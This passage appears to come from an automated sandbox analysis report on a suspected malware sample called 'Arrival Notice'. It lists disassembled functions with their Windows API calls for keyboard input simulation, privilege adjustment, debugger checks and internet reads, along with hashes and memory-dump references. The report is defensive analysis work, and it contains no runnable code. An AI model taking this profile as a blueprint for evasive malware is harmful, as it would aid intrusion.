                  • Opcode Fuzzy Hash: 5697926021814662940ad451ad5f0fa0c8eee8e0051e48b2bad0834ecc5c65b5
                  • Instruction Fuzzy Hash: 82514E715083009FD715EF24C886A6BBBE8FF89754F00492EF685DB252EB34D904CB92
                  Function 0041AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                  Download Yara Rule
                  APIs
                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0041AAAC
                  • SetKeyboardState.USER32(00000080), ref: 0041AAC8
                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0041AB36
                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0041AB88
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: KeyboardState$InputMessagePostSend
                  • String ID:
                  • API String ID: 432972143-0
                  • Opcode ID: b98e5963559b28cdf710d178ae8fe2fe8b33ff60f9dfd0c04349571e3a18cb58
                  • Instruction ID: 958ec7ef0044ba9c65ee72b058832ee9be307cd9fb63d7087a20d28be45e48ae
                  • Opcode Fuzzy Hash: b98e5963559b28cdf710d178ae8fe2fe8b33ff60f9dfd0c04349571e3a18cb58
                  • Instruction Fuzzy Hash: F8312970A86288AEEB30CB65CC05BFB77A6AF45310F04421BF281522D1D37DA9E1C75B
                  Function 003EBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 003EBB7F
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • GetTimeZoneInformation.KERNEL32 ref: 003EBB91
                  • WideCharToMultiByte.KERNEL32(00000000,?,0048121C,000000FF,?,0000003F,?,?), ref: 003EBC09
                  • WideCharToMultiByte.KERNEL32(00000000,?,00481270,000000FF,?,0000003F,?,?,?,0048121C,000000FF,?,0000003F,?,?), ref: 003EBC36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                  • String ID:
                  • API String ID: 806657224-0
                  • Opcode ID: c52fc15b67a84c6a514a72f802f2181e16f4647787231cc76189cd45e70f03a6
                  • Instruction ID: 6753ad1390bdff2db1c39f72a1eda41d4519c4ac53b138b8c9445dd59ec2edf6
                  • Opcode Fuzzy Hash: c52fc15b67a84c6a514a72f802f2181e16f4647787231cc76189cd45e70f03a6
                  • Instruction Fuzzy Hash: 02317C70908295DFCB12DF6A9C8196EFBBCBF46310B2547AAE051EB2B1D7309902CB54
                  Function 0042CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                  Download Yara Rule
                  APIs
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 0042CE89
                  • GetLastError.KERNEL32(?,00000000), ref: 0042CEEA
                  • SetEvent.KERNEL32(?,?,00000000), ref: 0042CEFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorEventFileInternetLastRead
                  • String ID:
                  • API String ID: 234945975-0
                  • Opcode ID: b0aea7792b5af495f2658aa672eb278ef22b11f772206e0f7adeee9423802b1f
                  • Instruction ID: 2621821571c5a0eb892a013167067bf35035ed9dc420d5d1674c39de42e44768
                  • Opcode Fuzzy Hash: b0aea7792b5af495f2658aa672eb278ef22b11f772206e0f7adeee9423802b1f
                  • Instruction Fuzzy Hash: 4C21E0716007159BD720DFA5E984BAB77F8EB00318F51442FE64692291E778EE04CB58
                  Function 00425C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 00425CC1
                  • FindNextFileW.KERNEL32(00000000,?), ref: 00425D17
                  • FindClose.KERNEL32(?), ref: 00425D5F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Find$File$CloseFirstNext
                  • String ID:
                  • API String ID: 3541575487-0
                  • Opcode ID: c20a5d3fd6ee07cffa4c19769f981a5adf517906ad26f3aa1001b12389ac9ce8
                  • Instruction ID: aad2201b8baff7472db2291394a198d7ef49398ec59c9de567a7e9a6224ab29e
                  • Opcode Fuzzy Hash: c20a5d3fd6ee07cffa4c19769f981a5adf517906ad26f3aa1001b12389ac9ce8
                  • Instruction Fuzzy Hash: 7C519835704A019FC714CF28D494A9AB7E4FF4A314F54855EEA5A8B3A2CB34EC05CB95
                  Function 003E2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 003E271A
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003E2724
                  • UnhandledExceptionFilter.KERNEL32(?), ref: 003E2731
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: fb468ec9c9a9de9b72ef51add64400d8b434c3f585dd8b0c4af80a4287488427
                  • Instruction ID: f37996db0eca6f22ebde675baae135f2bbf4c3e1b6a28a89e71091dd54e2b402
                  • Opcode Fuzzy Hash: fb468ec9c9a9de9b72ef51add64400d8b434c3f585dd8b0c4af80a4287488427
                  • Instruction Fuzzy Hash: C131B5759112289BCB22DF65DC8979DB7B8BF08710F5042EAE81CA7261E7709F818F45
                  Function 004251CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 004251DA
                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00425238
                  • SetErrorMode.KERNEL32(00000000), ref: 004252A1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorMode$DiskFreeSpace
                  • String ID:
                  • API String ID: 1682464887-0
                  • Opcode ID: 93d91270bef7e043cc17b384e0ad401fa7be7d6b07ba3081777eb5bb033284dd
                  • Instruction ID: 918472a40104f62bbf94d31023e04143bf8196f4814b7322b039124cd531ddd4
                  • Opcode Fuzzy Hash: 93d91270bef7e043cc17b384e0ad401fa7be7d6b07ba3081777eb5bb033284dd
                  • Instruction Fuzzy Hash: 15317F75A00518DFDB00DF54D8C4EADBBB4FF49318F588099E9059B392DB35E845CB64
                  Function 004116C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003CFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 003D0668
                    • Part of subcall function 003CFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 003D0685
                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041170D
                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041173A
                  • GetLastError.KERNEL32 ref: 0041174A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                  • String ID:
                  • API String ID: 577356006-0
                  • Opcode ID: 8d21c457cca7846faff0d19f60a2dcabeb750c7c976fecf639d78efdb0bc3d93
                  • Instruction ID: 7c7074616bcf81ae5043a880052a6c54e4bbcc1acc622a1374834b413674851f
                  • Opcode Fuzzy Hash: 8d21c457cca7846faff0d19f60a2dcabeb750c7c976fecf639d78efdb0bc3d93
                  • Instruction Fuzzy Hash: 0E11CEB2400304AFD718AF54DCCAEABB7B9EF04714B24852EE05697291EB70BC818B64
                  Function 0041D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0041D608
                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0041D645
                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0041D650
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CloseControlCreateDeviceFileHandle
                  • String ID:
                  • API String ID: 33631002-0
                  • Opcode ID: 215bce6efab622cd31607deee73d497949dd50928f2770d41e824e8ac4f7644d
                  • Instruction ID: 809e17b7a7c2a585db22c5f2ce7c27916d9e24222f47ce60b785c84ffc5b7675
                  • Opcode Fuzzy Hash: 215bce6efab622cd31607deee73d497949dd50928f2770d41e824e8ac4f7644d
                  • Instruction Fuzzy Hash: 0E1182B5E01228BFDB108F94DC45FEFBBBCEB45B50F104122F904E7290C2705A018BA5
                  Function 00411663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule
                  APIs
                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0041168C
                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004116A1
                  • FreeSid.ADVAPI32(?), ref: 004116B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AllocateCheckFreeInitializeMembershipToken
                  • String ID:
                  • API String ID: 3429775523-0
                  • Opcode ID: 04f1f4fcc5b202044781c401a4edbfc8b7f7a5199a9aa8e777ab426f82c4e652
                  • Instruction ID: 129a3d9ed843246a94494103c74f747428fef0d2a03c670ccbed161c2a126615
                  • Opcode Fuzzy Hash: 04f1f4fcc5b202044781c401a4edbfc8b7f7a5199a9aa8e777ab426f82c4e652
                  • Instruction Fuzzy Hash: 3BF04475A41308FBDB00CFE08C89EAEBBBCEB08200F004861E500E2180E334AA448A58
                  Function 003D4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(003E28E9,?,003D4CBE,003E28E9,004788B8,0000000C,003D4E15,003E28E9,00000002,00000000,?,003E28E9), ref: 003D4D09
                  • TerminateProcess.KERNEL32(00000000,?,003D4CBE,003E28E9,004788B8,0000000C,003D4E15,003E28E9,00000002,00000000,?,003E28E9), ref: 003D4D10
                  • ExitProcess.KERNEL32 ref: 003D4D22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 9d6e8dfea2b8a99700c44f0c7f9da4527f3c10df50e4c27e392a308750424c5d
                  • Instruction ID: 97a70de6be0737f21468fe5f7a241a02765907e3757f40bd5d2fb5621df65010
                  • Opcode Fuzzy Hash: 9d6e8dfea2b8a99700c44f0c7f9da4527f3c10df50e4c27e392a308750424c5d
                  • Instruction Fuzzy Hash: 9DE0B636001188ABCF62AF64ED49A583B6AEB42781B194025FC058B223CB35DD42CA84
                  Function 0040D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • GetUserNameW.ADVAPI32(?,?), ref: 0040D28C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: NameUser
                  • String ID: X64
                  • API String ID: 2645101109-893830106
                  • Opcode ID: 31f8b799ec0fc15876545c27a060af284dd06cf6313867375b784b75d5b06693
                  • Instruction ID: f564cf449ce8760f113ca3a3326043111e8d0079c2f6950c52e135dfd9f2c3da
                  • Opcode Fuzzy Hash: 31f8b799ec0fc15876545c27a060af284dd06cf6313867375b784b75d5b06693
                  • Instruction Fuzzy Hash: 76D0C9B480212DEBCB90CB90DCC8DD9B37CBB04305F1001A6F106E2040D73495498F10
                  Function 003DCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                  • Instruction ID: 35b65b9d265bbdd2038f87d13e1fda87d5206ea6b75bb1b7fa07818f67613c77
                  • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                  • Instruction Fuzzy Hash: 95023E72E2011A9BDF15CFA9D9806ADFBF5EF48314F25416AE919EB380D731AD41CB80
                  Function 003BCAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: Variable is not of type 'Object'.$p#H
                  • API String ID: 0-701791887
                  • Opcode ID: 9589559b096a225e18426465e41251a690da23e58d147dbcbb3e0862e7beaf3a
                  • Instruction ID: 189798eda9a1a3d99b7bcef38411702722d0bfcd77157af16649ddbd32ee0541
                  • Opcode Fuzzy Hash: 9589559b096a225e18426465e41251a690da23e58d147dbcbb3e0862e7beaf3a
                  • Instruction Fuzzy Hash: 5032AF34910218DBDF25DF90C890BFEB7B9BF04308F14506AEA06BB682D775AD46CB64
                  Function 004268EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 00426918
                  • FindClose.KERNEL32(00000000), ref: 00426961
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID:
                  • API String ID: 2295610775-0
                  • Opcode ID: 2227bcd7d299694d6fd6424d0f593410623eb45853decf9d7717c9ed9072b05c
                  • Instruction ID: ebaf137c5975cfee39038b88a8219126cd5a951e0aa72a55859106e8701618fe
                  • Opcode Fuzzy Hash: 2227bcd7d299694d6fd6424d0f593410623eb45853decf9d7717c9ed9072b05c
                  • Instruction Fuzzy Hash: D411D0756042109FC710CF29D484A26BBE1FF85328F45C6AAF5698F7A2CB74EC45CB91
                  Function 004237B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00434891,?,?,00000035,?), ref: 004237E4
                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00434891,?,?,00000035,?), ref: 004237F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  • Opcode ID: 1e0b71be4ad420a95eb8657b8a5dd6374f4b60e67eb625277388fd393c8307da
                  • Instruction ID: 4f7d2c5e150c7d149050753a5c908753ca8d7a2418d43570c8aaa6a16f3d892e
                  • Opcode Fuzzy Hash: 1e0b71be4ad420a95eb8657b8a5dd6374f4b60e67eb625277388fd393c8307da
                  • Instruction Fuzzy Hash: 64F0EC747053286BDB5017655C4DFEB7A6DEFC5761F000276F605D2291D9605904C6B4
                  Function 0041B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0041B25D
                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0041B270
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: InputSendkeybd_event
                  • String ID:
                  • API String ID: 3536248340-0
                  • Opcode ID: 2f077e0e39d018062a8adcc9392e0eb43bf15182594bf92684c9f337e6ca8a52
                  • Instruction ID: c5cac43685ed8e9fea23cdfd2924b9b138df958d48de3582f0a36ebc9a55e472
                  • Opcode Fuzzy Hash: 2f077e0e39d018062a8adcc9392e0eb43bf15182594bf92684c9f337e6ca8a52
                  • Instruction Fuzzy Hash: 78F06D7480424EABDB058FA0C805BEE7BB0FF04305F04805AF951A5191C37982059F98
                  Function 004110BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                  Download Yara Rule
                  APIs
                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004111FC), ref: 004110D4
                  • CloseHandle.KERNEL32(?,?,004111FC), ref: 004110E9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AdjustCloseHandlePrivilegesToken
                  • String ID:
                  • API String ID: 81990902-0
                  • Opcode ID: f7bfae7e85e4dee42614738eedb97b6b857061fd2c7f9e113cb9c34e2f1deb06
                  • Instruction ID: 0c0a114aecde7a6e5f3f49763501ce8714f259c931c55e4869997558e0259264
                  • Opcode Fuzzy Hash: f7bfae7e85e4dee42614738eedb97b6b857061fd2c7f9e113cb9c34e2f1deb06
                  • Instruction Fuzzy Hash: F2E04F32005610AEE7262B61FC09F737BA9EB04310B14882EF5A6844B1DB626C90DB54
                  Function 003E676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
